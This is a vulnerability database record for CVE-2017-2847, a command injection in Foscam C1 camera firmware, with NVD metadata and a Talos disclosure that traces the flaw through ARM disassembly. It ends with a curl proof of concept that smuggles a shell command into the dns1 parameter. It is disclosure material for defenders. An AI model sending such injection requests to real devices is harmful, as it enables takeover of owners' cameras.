ID CVE-2017-2847 Type cve Reporter NVD Modified 2017-07-05T11:06:15
Description
In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.
{"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2847", "history": [{"lastseen": "2017-06-30T10:41:17", "differentElements": ["references", "modified"], "edition": 1, "bulletin": {"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2847", "history": [], "id": "CVE-2017-2847", "published": "2017-06-29T13:29:00", "description": "In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.", "bulletinFamily": "NVD", "title": "CVE-2017-2847", "type": "cve", "cpe": [], "assessment": {"href": "", "name": "", "system": ""}, "scanner": [], "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "published", "hash": "c33e8507a1d5d992c974601f441cf0b2"}, {"key": "modified", "hash": "c33e8507a1d5d992c974601f441cf0b2"}, {"key": "description", "hash": "d129239456b6d7b914f8e7bc7ac2409e"}, {"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "references", "hash": "11ecb6aa7c4d08e12bb55f06db7ba657"}, {"key": "href", "hash": "629184407aa0010fe8a2ce2f9705ea72"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "cvelist", "hash": "ebb0c7ef74ab3caf717ae70e732ba7fb"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "title", "hash": "a2ce50e102e1bc6c55f949261280e032"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "a69fa45415bfb27a63e0570ab406e61df1d777a37ef33b2a40d0476d64364790", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2017-0349"], "edition": 1, "cvelist": ["CVE-2017-2847"], "lastseen": "2017-06-30T10:41:17", "viewCount": 0, "enchantments": {}, "reporter": "NVD", "objectVersion": "1.3", "modified": "2017-06-29T13:29:00"}}, {"lastseen": "2017-07-01T10:44:17", "differentElements": ["cvss", "modified", "cpe"], "edition": 2, "bulletin": {"href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2847", "history": [], "id": "CVE-2017-2847", "published": "2017-06-29T13:29:00", "description": "In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.", "bulletinFamily": "NVD", "title": "CVE-2017-2847", "type": "cve", "cpe": [], "assessment": {"href": "", "name": "", "system": ""}, "scanner": [], "cvss": {"score": 0.0, "vector": "NONE"}, "hashmap": [{"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "modified", "hash": "f1cbbc7eba4c93d9405bfbe3acd654c2"}, {"key": "published", "hash": "c33e8507a1d5d992c974601f441cf0b2"}, {"key": "description", "hash": "d129239456b6d7b914f8e7bc7ac2409e"}, {"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "references", "hash": "3fb04ae78a685ac98d244bfae18f074a"}, {"key": "href", "hash": "629184407aa0010fe8a2ce2f9705ea72"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "cvelist", "hash": "ebb0c7ef74ab3caf717ae70e732ba7fb"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "title", "hash": "a2ce50e102e1bc6c55f949261280e032"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}], "hash": "e3823bf95def3e19fb52e1bf824878766fb4f122907ac6a1bec3a84749fd95bb", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2017-0349", "http://www.securityfocus.com/bid/99184"], "edition": 2, "cvelist": ["CVE-2017-2847"], "lastseen": "2017-07-01T10:44:17", "viewCount": 0, "enchantments": {}, "reporter": "NVD", "objectVersion": "1.3", "modified": "2017-06-30T21:30:21"}}], "assessment": {"href": "", "name": "", "system": ""}, "id": "CVE-2017-2847", "reporter": "NVD", "published": "2017-06-29T13:29:00", "description": "In the web management interface in Foscam C1 Indoor HD cameras with application firmware 2.52.2.37, a specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.", "title": "CVE-2017-2847", "cpe": ["cpe:/o:foscam:c1_indoor_hd_camera_firmware:2.52.2.37"], "bulletinFamily": "NVD", "type": "cve", "scanner": [], "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "hash": "05de50da38abe6273c92d99e8147ad3a415d4c9a3f8e74c585b7a15189748027", "references": ["https://talosintelligence.com/vulnerability_reports/TALOS-2017-0349", "http://www.securityfocus.com/bid/99184"], "edition": 3, "cvelist": ["CVE-2017-2847"], "lastseen": "2017-07-06T02:16:50", "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "07073b066b89f30ba0636fd330dba492"}, {"key": "cvelist", "hash": "ebb0c7ef74ab3caf717ae70e732ba7fb"}, {"key": "cvss", "hash": "9acfc3ecd06539a3534549fd05dfad8e"}, {"key": "description", "hash": "d129239456b6d7b914f8e7bc7ac2409e"}, {"key": "href", "hash": "629184407aa0010fe8a2ce2f9705ea72"}, {"key": "modified", "hash": "29e9bd59f62eecbf0c4ac93b326fa08d"}, {"key": "published", "hash": "c33e8507a1d5d992c974601f441cf0b2"}, {"key": "references", "hash": "3fb04ae78a685ac98d244bfae18f074a"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "a2ce50e102e1bc6c55f949261280e032"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "objectVersion": "1.3", "modified": "2017-07-05T11:06:15"}
{"seebug": [{"lastseen": "2017-11-19T11:56:57", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "### Summary\r\n\r\nAn exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.\r\n\r\n### Tested Versions\r\nFoscam, Inc. Indoor IP Camera C1 Series\r\n```\r\nSystem Firmware Version: 1.9.3.17\r\nApplication Firmware Version: 2.52.2.37\r\nWeb Version: 2.0.1.1\r\nPlug-In Version: 3.3.0.5\r\n```\r\n\r\n### Product URLs\r\nFoscam\r\n\r\n### Details\r\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market.\r\nWhen various services are started, a service will first register a callback using the `CMsgClient::registerMsgHandle` function [1]. This will register a function to be called [2] when another service dispatches a message of the specified code [3]. An example of this registration process is handled inside the `FCGI_Init` function of the \"CGIProxy.fcgi\" service using the following code:\r\n```\r\n.text:00009F20 FCGX_Init_1f20\r\n.text:00009F20\r\n.text:00009F20 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:00009F24 41 DE 4D E2 SUB SP, SP, #0x410\r\n.text:00009F28 08 D0 4D E2 SUB SP, SP, #8\r\n.text:00009F2C 05 FC FF EB BL FCGX_Init\r\n.text:00009F2C\r\n.text:00009F30 00 10 50 E2 SUBS R1, R0, #0\r\n.text:00009F34 44 01 9F 15 LDRNE R0, =str.FCGX_Initfailed\r\n.text:00009F38 05 00 00 1A BNE leave_exit_1f54\r\n.text:00009F3C\r\n.text:00009F3C 40 01 9F E5 LDR R0, =gv_theRequest_10b74\r\n.text:00009F40 01 20 A0 E1 MOV R2, R1\r\n.text:00009F44 1A FC FF EB BL FCGX_InitRequest\r\n.text:00009F48\r\n.text:00009F48 00 00 50 E3 CMP R0, #0\r\n.text:00009F4C 03 00 00 0A BEQ loc_9F60\r\n...\r\n.text:00009F60 loc_9F60\r\n.text:00009F60 DB FE FF EB BL registerMsgClients_1ad4\r\n\r\n.text:00009AD4 registerMsgClients_1ad4\r\n.text:00009AD4 10 40 2D E9 STMFD SP!, {R4,LR}\r\n.text:00009AD4\r\n.text:00009AD8 30 40 9F E5 LDR R4, =gp_cMsgClient_bac8\r\n.text:00009ADC 30 10 9F E5 LDR R1, =0x40004001 ; [3] code\r\n.text:00009AE0 04 00 A0 E1 MOV R0, R4\r\n.text:00009AE4 2C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38 ; [2] callback function\r\n.text:00009AE8 3D FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int)) ; [1]\r\n.text:00009AE8\r\n.text:00009AEC 04 00 A0 E1 MOV R0, R4\r\n.text:00009AF0 24 10 9F E5 LDR R1, =0x3001\r\n.text:00009AF4 1C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009AF8 39 FD FF EB BL CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n.text:00009AF8\r\n.text:00009AFC 04 00 A0 E1 MOV R0, R4\r\n.text:00009B00 18 10 9F E5 LDR R1, =0x3002\r\n.text:00009B04 0C 20 9F E5 LDR R2, =CgiProxySnapPicHandler_1e38\r\n.text:00009B08 10 40 BD E8 LDMFD SP!, {R4,LR}\r\n.text:00009B0C 34 FD FF EA B CMsgClient::registerMsgHandle(int,void (*)(char const*,int))\r\n```\r\n\r\nAfter the \"CGIProxy.fcgi\" service decodes an HTTP request that's forwarded from the HTTP daemon, the service will copy the decoded query into a buffer on the stack [4]. Once this is done, the buffer will then be used to pass the decoded query to `CMsgClient::sendMsg`. This will dispatch the query to the shared messaging subsystem using the code 0x4001 at [5]. At this point, the service that handles the specified code will be woken up to handle the specified request.\r\n```\r\n.text:00009FA8 14 70 8D E2 ADD R7, SP, #0x430+lv_dest_41c\r\n.text:00009FAC 08 10 A0 E1 MOV R1, R8\r\n.text:00009FB0 07 00 A0 E1 MOV R0, R7\r\n.text:00009FB4 34 FC FF EB BL strcpy ; [4]\r\n.text:00009FB8\r\n.text:00009FB8 08 00 A0 E1 MOV R0, R8\r\n.text:00009FBC C0 FB FF EB BL strlen\r\n.text:00009FC0\r\n.text:00009FC0 CC 30 9F E5 LDR R3, =0x404\r\n.text:00009FC4 00 30 8D E5 STR R3, [SP]\r\n.text:00009FC8 C8 10 9F E5 LDR R1, =0x4001 ; [5]\r\n.text:00009FCC 07 30 A0 E1 MOV R3, R7 ; uri request\r\n.text:00009FD0 01 20 A0 E3 MOV R2, #1\r\n.text:00009FD4 04 40 8D E5 STR R4, [SP,#4]\r\n.text:00009FD8 08 40 8D E5 STR R4, [SP,#8]\r\n.text:00009FDC 0C 40 8D E5 STR R4, [SP,#12]\r\n.text:00009FE0 14 04 8D E5 STR R0, [SP,#0x430+var_1C]\r\n.text:00009FE4 B0 00 9F E5 LDR R0, =gp_cMsgClient_bac8\r\n.text:00009FE8 CD FB FF EB BL CMsgClient::sendMsg(int,char,char const*,int,int,int,char *)\r\n```\r\n\r\nThe handler for code 0x4001 is in the \"webService\" binary and is done by the function `executeCGICmd` at address 0x1e5a4. At the beginning of this function, the service will call a function [6] that's responsible for extracting the user name, password, and command that was specified within the user's query. Once the parameters have been extracted and copied into a local buffer on the stack, the command will be passed to the function call at [7] in order to determine the correct command function which is stored to `funcptr`. If authentication is not required for the command, then the branch at [8] will execute the function pointer returned by `findJsonCallbackCommand` at [7]. If authentication is required from the command, then the user name and password will be checked via `strcmp` and then the function call at [9] will execute the function pointer.\r\n\r\n```\r\n.text:0001E5A4 executeCGICmd\r\n.text:0001E5A4\r\n.text:0001E5A4 F0 41 2D E9 STMFD SP!, {R4-R8,LR}\r\n.text:0001E5A8 28 60 80 E2 ADD R6, R0, #0x28\r\n.text:0001E5AC 11 DD 4D E2 SUB SP, SP, #0x440\r\n.text:0001E5B0 00 80 A0 E1 MOV R8, R0\r\n.text:0001E5B4 06 10 A0 E1 MOV R1, R6\r\n.text:0001E5B8 C4 00 9F E5 LDR R0, =unk_D5A68\r\n.text:0001E5BC 3A 2A 00 EB BL sub_28EAC ; [6]\r\n\r\n.text:00028EAC sub_28EAC\r\n.text:00028EAC\r\n.text:00028EAC F0 47 2D E9 STMFD SP!, {R4-R10,LR}\r\n.text:00028EB0 00 40 51 E2 SUBS R4, R1, #0\r\n.text:00028EB4 00 80 A0 E1 MOV R8, R0\r\n.text:00028EB8 46 DF 4D E2 SUB SP, SP, #0x118\r\n.text:00028EBC 00 00 E0 03 MOVEQ R0, #0xFFFFFFFF\r\n.text:00028EC0 8B 00 00 0A BEQ leaving_290F4\r\n...\r\n.text:00028F4C 00 00 50 E3 CMP R0, #0\r\n.text:00028F50 0C 00 00 1A BNE findCmdCallback_28F88\r\n...\r\n.text:00028F88 findCmdCallback_28F88\r\n.text:00028F88 05 00 A0 E1 MOV R0, R5\r\n.text:00028F8C 45 1F 8D E2 ADD R1, SP, #0x138+lp_funcptr?_24\r\n.text:00028F90 89 FC FF EB BL findJsonCallbackCommand_281BC ; [7]\r\n.text:00028F94 00 90 50 E2 SUBS R9, R0, #0\r\n.text:00028F98 06 00 00 0A BEQ checkIfAuthNeeded_28FB8\r\n...\r\n.text:00028FB8 checkIfAuthNeeded_28FB8\r\n.text:00028FB8 14 31 9D E5 LDR R3, [SP,#0x138+lp_funcptr?_24]\r\n.text:00028FBC 54 21 9F E5 LDR R2, =0xFFFF\r\n.text:00028FC0 08 10 93 E5 LDR R1, [R3,#8]\r\n.text:00028FC4 02 00 51 E1 CMP R1, R2\r\n.text:00028FC8 06 00 00 1A BNE authenticate_28FE8\r\n...\r\n.text:00028FD8 04 00 A0 E1 MOV R0, R4\r\n.text:00028FDC 33 FF 2F E1 BLX R3 ; [8]\r\n.text:00028FE0 09 00 A0 E1 MOV R0, R9\r\n.text:00028FE4 42 00 00 EA B leaving_290F4\r\n...\r\n.text:000290E0 04 00 A0 E1 MOV R0, R4\r\n.text:000290E4 33 FF 2F E1 BLX R3 ; [9]\r\n.text:000290E8 05 00 A0 E1 MOV R0, R5\r\n.text:000290EC 00 00 00 EA B leaving_290F4\r\n...\r\n.text:000290F4 46 DF 8D E2 ADD SP, SP, #0x118\r\n.text:000290F8 F0 87 BD E8 LDMFD SP!, {R4-R10,PC}\r\n```\r\nWhen handling the \"CGIProxy.fcgi\" command \"setIpInfo\", the function `setIpInfo_37f30` will be called. This function is responsible for setting up the interface either via dhcp or by manually setting an IP address, netmask, gateway and dns. At the beginning of the function, the parameters [10] for \"callbackJson\", \"isDHCP\", \"ip\", \"gate\", \"mask\", \"dns1\", \"dns2\" are extracted from the query. Afterwards, the \"isDHCP\" value [11] is checked against 0 and if it is, the the \"ip\" and \"mask\" parameter values are passed to the function `sub_3FE28` [12] to be parsed using `inet_addr`: 0 is returned if parameters are correctly parsed, -1 otherwise. The return value is passed via IPC via code 0x3001 [13], which is handled by the binary \"CGIProxy.fcgi\" and takes care of returning the error code as result of the operation. Regardless the \"ip\" and \"mask\" parameters were parsed correctly or not, the execution will continue and another message is sent with code 0x601d via IPC [14].\r\n```\r\n.text:0003FF30 setIpInfo_37f30\r\n.text:0003FF30\r\n.text:0003FF30 F0 40 2D E9 STMFD SP!, {R4-R7,LR}\r\n...\r\n.text:0003FF54 38 11 9F E5 LDR R1, =str.callbackJson\r\n.text:0003FF58 BA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF60 30 11 9F E5 LDR R1, =str.isDHCP\r\n...\r\n.text:0003FF68 B6 A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FF7C 18 11 9F E5 LDR R1, =str.ip\r\n...\r\n.text:0003FF98 AA A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFA0 F8 10 9F E5 LDR R1, =str.gate\r\n...\r\n.text:0003FFAC A5 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFB0 EC 10 9F E5 LDR R1, =str.mask\r\n...\r\n.text:0003FFBC A1 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFC0 E0 10 9F E5 LDR R1, =str.dns1\r\n...\r\n.text:0003FFCC 9D A0 FF EB BL extract_param ; [10]\r\n...\r\n.text:0003FFD4 D0 10 9F E5 LDR R1, =str.dns2\r\n...\r\n.text:0003FFDC 99 A0 FF EB BL extract_param ; [10]\r\n.text:0003FFE0 1C 34 DD E5 LDRB R3, [SP,#0x4E0+var_C4] ; [11]\r\n.text:0003FFE4 00 00 53 E3 CMP R3, #0\r\n.text:0003FFE8 05 00 00 1A BNE loc_40004\r\n.text:0003FFEC 07 00 A0 E1 MOV R0, R7 ; \"ip\" value\r\n.text:0003FFF0 06 10 A0 E1 MOV R1, R6 ; \"mask\" value\r\n.text:0003FFF4 8B FF FF EB BL sub_3FE28 ; [12]\r\n.text:0003FFF8 00 00 50 E3 CMP R0, #0\r\n.text:0003FFFC 00 20 E0 13 MOVNE R2, #0xFFFFFFFF\r\n.text:00040000 00 00 00 1A BNE loc_40008\r\n.text:00040004\r\n.text:00040004 loc_40004\r\n.text:00040004 00 20 A0 E3 MOV R2, #0\r\n.text:00040008\r\n.text:00040008 loc_40008\r\n...\r\n.text:00040034 7C 10 9F E5 LDR R1, =0x3001 ; [13]\r\n...\r\n.text:00040050 81 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040068 54 10 9F E5 LDR R1, =0x601D ; [14]\r\n...\r\n.text:00040084 74 4A FF EB BL CMsgClient::sendMsg()\r\n...\r\n.text:00040090 F0 80 BD E8 LDMFD SP!, {R4-R7,PC}\r\n```\r\nCode 0x601d is handled in the \"devMng\" binary by the function `OnDevMngMsgSetIpInfo_120ac`. The function extracts \"isDHCP\", ip\", \"mask\", \"gate\", \"dns1\" and \"dns2\" parameters from the IPC call and passes them to the function `sub_3D880` [15]. This function checks a global variable for the state of the operation. In this first call, the branch is not taken and the function will only call `sub_37ED8` [17], which saves all the parameters in \"/mnt/mtd/app/config/NetworkConfig.bin\". Parameters are also saved in a global structure, to allow access from concurring threads. If no errors are returned, `OnDevMngMsgSetIpInfo_120ac` will call `sub_3AAE4` [19] by passing the pointer to a global structure [18]. The purpose of this function is to flag the completion of the interfaces configuration by putting \"1\" into the structure, at 0x8822c [20].\r\n```\r\n.text:0001A0AC OnDevMngMsgSetIpInfo_120ac\r\n.text:0001A0AC\r\n.text:0001A0AC 70 40 2D E9 STMFD SP!, {R4-R6,LR}\r\n...\r\n.text:0001A140 CE 8D 00 EB BL sub_3D880 ; [15]\r\n\r\n\r\n.text:0003D880 sub_3D880\r\n.text:0003D880\r\n.text:0003D880 F0 45 2D E9 STMFD SP!, {R4-R8,R10,LR}\r\n...\r\n.text:0003D898 00 20 D2 E5 LDRB R2, [R2] ; [16]\r\n.text:0003D89C 1A 00 00 0A BEQ loc_3D90C\r\n.text:0003D8A0 00 00 52 E3 CMP R2, #0\r\n...\r\n.text:0003D8BC 05 10 A0 E1 MOV R1, R5\r\n.text:0003D8C0 04 30 D1 E4 LDRB R3, [R1],#4\r\n.text:0003D8C4 10 30 C4 E5 STRB R3, [R4,#0x10]\r\n.text:0003D8C8 14 00 84 E2 ADD R0, R4, #0x14\r\n.text:0003D8CC 9E 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8D0 08 10 85 E2 ADD R1, R5, #8\r\n.text:0003D8D4 18 00 84 E2 ADD R0, R4, #0x18\r\n.text:0003D8D8 9B 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8DC 0C 10 85 E2 ADD R1, R5, #0xC\r\n.text:0003D8E0 1C 00 84 E2 ADD R0, R4, #0x1C\r\n.text:0003D8E4 98 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8E8 10 10 85 E2 ADD R1, R5, #0x10\r\n.text:0003D8EC 20 00 84 E2 ADD R0, R4, #0x20\r\n.text:0003D8F0 95 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D8F4 24 00 84 E2 ADD R0, R4, #0x24\r\n.text:0003D8F8 14 10 85 E2 ADD R1, R5, #0x14\r\n.text:0003D8FC 92 52 FF EB BL std::string::operator=(std::string const&)\r\n.text:0003D900 10 00 84 E2 ADD R0, R4, #0x10\r\n.text:0003D904 73 E9 FF EB BL sub_37ED8 ; [17]\r\n...\r\n.text:0003E078 F0 85 BD E8 LDMFD SP!, {R4-R8,R10,PC}\r\n\r\n... OnDevMngMsgSetIpInfo_120ac\r\n...\r\n.text:0001A144 01 00 70 E3 CMN R0, #1\r\n.text:0001A148 04 00 00 0A BEQ loc_1A160\r\n.text:0001A14C 54 00 9F E5 LDR R0, =dword_85D88 ; [18]\r\n...\r\n.text:0001A15C 60 82 00 EB BL sub_3AAE4 ; [19]\r\n\r\n.text:0003AAE4 sub_3AAE4\r\n...\r\n.text:0003AB08 00 40 A0 E1 MOV R4, R0\r\n...\r\n.text:0003ABCC 34 30 9F E5 LDR R3, =0x24A4\r\n.text:0003ABD0 01 20 A0 E3 MOV R2, #1\r\n.text:0003ABD4 03 20 C4 E7 STRB R2, [R4,R3] ; [20]\r\n```\r\n\r\nThe application creates 13 threads in total at startup. One of them is continuously polling for network changes: `sub_42DE0`. Two functions are called in a loop: one for softAP configuration [21] and one for wifi and ethernet connections [22]. We will explore the latter.\r\n```\r\n.text:00042DE0 sub_42DE0\r\n.text:00042DE0\r\n.text:00042DE0 38 40 2D E9 STMFD SP!, {R3-R5,LR}\r\n.text:00042DE4 00 40 A0 E1 MOV R4, R0\r\n.text:00042DE8 06 50 A0 E3 MOV R5, #6\r\n.text:00042DEC\r\n.text:00042DEC loc_42DEC\r\n.text:00042DEC 05 10 A0 E1 MOV R1, R5\r\n.text:00042DF0 04 00 A0 E1 MOV R0, R4\r\n.text:00042DF4 68 E6 FF EB BL sub_3C79C ; [21]\r\n.text:00042DF8 00 10 A0 E1 MOV R1, R0\r\n.text:00042DFC 04 00 A0 E1 MOV R0, R4\r\n.text:00042E00 BE FE FF EB BL sub_42900 ; [22]\r\n.text:00042E04 00 50 A0 E1 MOV R5, R0\r\n.text:00042E08 04 00 9F E5 LDR R0, =0xF4240\r\n.text:00042E0C 51 3D FF EB BL usleep\r\n.text:00042E10 F5 FF FF EA B loc_42DEC ; loop\r\n```\r\n\r\n`sub_42900` is the function that actually checks for the value of the global variable at 0x8822c [23]. As soon as its value is not 0, the function sub_428E0 is called.\r\n```\r\n.text:00042D4C 88 30 9F E5 LDR R3, =0x24A4\r\n.text:00042D50 03 20 D4 E7 LDRB R2, [R4,R3] ; [23]\r\n.text:00042D54 00 00 52 E3 CMP R2, #0\r\n.text:00042D58 04 00 00 0A BEQ loc_42D70\r\n.text:00042D5C 00 20 A0 E3 MOV R2, #0\r\n.text:00042D60 03 20 C4 E7 STRB R2, [R4,R3]\r\n.text:00042D64 04 00 A0 E1 MOV R0, R4\r\n.text:00042D68 05 10 A0 E1 MOV R1, R5\r\n.text:00042D6C DB FE FF EB BL sub_428E0\r\n```\r\nAt this point the execution will continue with many different calls, from a higher level perspective the following is the path that will be taken, stripped to only interesting the stubs (capital names are user-controlled strings):\r\n```\r\nsub_428E0\r\n sub_3FB2C\r\n sub_3B94C\r\n system(\"ifconfig eth0 0.0.0.0\")\r\n system(\"ifconfig ra0 up\")\r\n sub_3B8F0\r\n sub_3A95C\r\n system(\"rm -rf /var/run/wpa_supplicant\")\r\n system(\"ifconfig ra0 down\")\r\n system(\"killall wpa_supplicant\")\r\n sub_3B804\r\n system(\"ifconfig ra0 up\")\r\n sub_4286C\r\n sub_3E164\r\n system(\"ifconfig ra0 0.0.0.0\")\r\n system(\"ifconfig ra0 down\")\r\n sub_3D880\r\n system(\"killall udhcpc\")\r\n fork()\r\n child: execlp(\"ifconfig\", \"ifconfig\", \"eth0\", IP, \"netmask\", NETMASK)\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route del default dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"route add default gw GATEWAY dev eth0\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS1 > /etc/resolv.conf\")\r\n fork()\r\n child: execlp(\"sh\", \"sh\", \"-c\", \"echo nameserver DNS2 >> /etc/resolv.conf\")\r\n system(\"killall -9 OnvifAgent\")\r\n```\r\n\r\nFunction `sub_3E164` fetches the parameters from a global structure and passes them to `sub_3D880`. Function `sub_3D880` was already called before, but this time the global state is different. The function thus takes a different branch and the actual interface configuration takes place. User-supplied parameters are taken unmodified from a global structure. In this function the dns1 parameter [24] is never sanitized and used in a `sprintf` [25] call to build the final command that will be passed to `execlp` [26].\r\n\r\n```\r\n.text:0003DF90 B4 11 9F E5 LDR R1, =str.echonameservers1 ; \"echo nameserver %s > /etc/resolv.conf\"\r\n.text:0003DF94 10 20 95 E5 LDR R2, [R5,#0x10] ; [24]\r\n.text:0003DF98 04 00 A0 E1 MOV R0, R4\r\n.text:0003DF9C 66 53 FF EB BL sprintf ; [25]\r\n.text:0003DFA0 A4 53 FF EB BL fork\r\n.text:0003DFA4 00 30 50 E2 SUBS R3, R0, #0\r\n.text:0003DFA8 0C 00 00 1A BNE loc_3DFE0\r\n.text:0003DFAC 88 01 9F E5 LDR R0, =str.sh ; \"sh\"\r\n.text:0003DFB0 00 30 8D E5 STR R3, [SP,#0xD8+var_D8]\r\n.text:0003DFB4 00 10 A0 E1 MOV R1, R0\r\n.text:0003DFB8 80 21 9F E5 LDR R2, =str._c ; \"-c\"\r\n.text:0003DFBC 04 30 A0 E1 MOV R3, R4 ; [26]\r\n.text:0003DFC0 CC 53 FF EB BL execlp\r\n```\r\n\r\n### Exploit Proof-of-Concept\r\nThis vulnerability is reachable by the \"setIpInfo\" command and requires a valid user account with administrator privileges. The following proof of concept shows how to execute an arbitrary command.\r\n```\r\n$ sUsr=\"admin\"\r\n$ sPwd=\"\"\r\n$ sIP=192.168.0.20\r\n$ sMask=255.255.255.0\r\n$ sGW=192.168.0.1\r\n$ sDns1=1.1.1.1\r\n$ sDns2=2.2.2.2\r\n$ sCmd=`perl -MURI::Escape -e 'print uri_escape(\";id>/tmp/www/inj;\")'`\r\n$ curl \"http://$SERVER/cgi-bin/CGIProxy.fcgi?usr=guest&pwd=asd0--&cmd=setIpInfo&isDHCP=0&ip=${sIP}&mask=${sMask}&gate=${sGW}&dns1=${sDns1}${sCmd}&dns2=${sDns2}\"\r\n```\r\n\r\n### Timeline\r\n* 2017-05-30 - Vendor Disclosure\r\n* 2017-06-19 - Public Release\r\n\r\n### CREDIT\r\nDiscovered by Claudio Bozzato of Cisco Talos.", "reporter": "Root", "published": "2017-07-04T00:00:00", "type": "seebug", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Foscam IP Video Camera Command Injection Vulnerability(CVE-2017-2847)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-2847"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2017-07-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-96265", "id": "SSV:96265", "sourceData": "", "sourceHref": "", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "status": "cve,details"}, {"lastseen": "2017-11-19T12:02:06", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "### Summary\r\nAn exploitable command injection vulnerability exists in the web management interface used by the Foscam C1 Indoor HD Camera running application firmware 2.52.2.37. A specially crafted HTTP request can allow for a user to inject arbitrary shell characters during manual network configuration resulting in command injection. An attacker can simply send an HTTP request to the device to trigger this vulnerability.\r\n\r\n### Tested Versions\r\n```\r\nFoscam, Inc. Indoor IP Camera C1 Series\r\nSystem Firmware Version: 1.9.3.17\r\nApplication Firmware Version: 2.52.2.37\r\nWeb Version: 2.0.1.1\r\nPlug-In Version: 3.3.0.5\r\n```\r\n### Product URLs\r\nFoscam\r\n\r\n### CVSSv3 Score\r\n8.8 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\r\n\r\n### CWE\r\nCWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\r\n\r\n### Details\r\nFoscam produces a series of IP-capable surveillance devices, network video recorders, and baby monitors for the end-user. Foscam produces a range of cameras for both indoor and outdoor use and with wireless capability. One of these models is the C1 series which contains a web-based user interface for management and is based on the ARM architecture. Foscam is considered one of the most common security cameras out on the current market.\r\n\r\nWhen various services are started, a service will first register a callback using the `CMsgClient::registerMsgHandle` function [1]. This will register a function to be called [2] when 